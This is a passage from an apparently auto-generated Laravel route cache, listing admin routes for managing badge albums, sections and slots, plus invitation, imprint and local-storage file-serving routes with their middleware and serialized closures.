'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@create',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.create',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/badge-albums',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@store',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@store',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.edit' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin/badge-albums/{album}/edit',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@edit',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@edit',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.edit',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.update' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'admin/badge-albums/{album}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@update',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@update',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.destroy' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'admin/badge-albums/{album}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@destroy',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@destroy',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.destroy',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.sections.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/badge-albums/{album}/sections',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@storeSection',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@storeSection',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.sections.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.sections.update' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'admin/badge-albums/{album}/sections/{section}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@updateSection',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@updateSection',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.sections.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.sections.destroy' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'admin/badge-albums/{album}/sections/{section}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@destroySection',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@destroySection',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.sections.destroy',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.sections.reorder' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/badge-albums/{album}/sections/reorder',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@reorderSections',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@reorderSections',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.sections.reorder',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.sections.update-rule' =>
array (
'methods' =>
array (
0 => 'PATCH',
),
'uri' => 'admin/badge-albums/{album}/sections/{section}/rule',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@updateSectionRule',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@updateSectionRule',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.sections.update-rule',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.slots.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/badge-albums/{album}/sections/{section}/slots',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@storeSlot',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@storeSlot',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.slots.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.slots.update' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'admin/badge-albums/{album}/slots/{slot}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@updateSlot',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@updateSlot',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.slots.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.slots.destroy' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'admin/badge-albums/{album}/slots/{slot}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@destroySlot',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@destroySlot',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.slots.destroy',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.slots.reorder' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/badge-albums/{album}/sections/{section}/slots/reorder',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@reorderSlots',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@reorderSlots',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.slots.reorder',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.resolve-badge' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/badge-albums/resolve-badge',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@resolveBadge',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@resolveBadge',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.resolve-badge',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.search-badges' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin/badge-albums/search-badges',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@searchBadges',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@searchBadges',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.search-badges',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.badgau-status' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin/badge-albums/badgau-status',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@checkBadgauStatus',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@checkBadgauStatus',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.badgau-status',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.publish' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/badge-albums/{album}/publish',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@publish',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@publish',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.publish',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.unpublish' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/badge-albums/{album}/unpublish',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@unpublish',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@unpublish',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.unpublish',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'invitation.accept' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'invitation/{token}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\InvitationController@show',
'controller' => 'App\\Http\\Controllers\\InvitationController@show',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'invitation.accept',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'invitation.accept.post' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'invitation/{token}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\InvitationController@accept',
'controller' => 'App\\Http\\Controllers\\InvitationController@accept',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'invitation.accept.post',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'imprint' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'imprint',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:24:"fn() => \\view(\'imprint\')";s:5:"scope";s:37:"Illuminate\\Routing\\RouteFileRegistrar";s:4:"this";N;s:4:"self";s:32:"000000000000034e0000000000000000";}}',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'imprint',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'storage.local' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'storage/{path}',
'action' =>
array (
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:3:{s:4:"disk";s:5:"local";s:6:"config";a:5:{s:6:"driver";s:5:"local";s:4:"root";s:39:"/var/www/html/emaji/storage/app/private";s:5:"serve";b:1;s:5:"throw";b:0;s:6:"report";b:0;}s:12:"isProduction";b:0;}s:8:"function";s:323:"function (\\Illuminate\\Http\\Request $request, string $path) use ($disk, $config, $isProduction) {
return (new \\Illuminate\\Filesystem\\ServeFile(
$disk,
$config,
$isProduction
))($request, $path);
}";s:5:"scope";s:47:"Illuminate\\Filesystem\\FilesystemServiceProvider";s:4:"this";N;s:4:"self";s:32:"00000000000003500000000000000000";}}',
'as' => 'storage.local',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
'path' => '.*',
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
),
)
);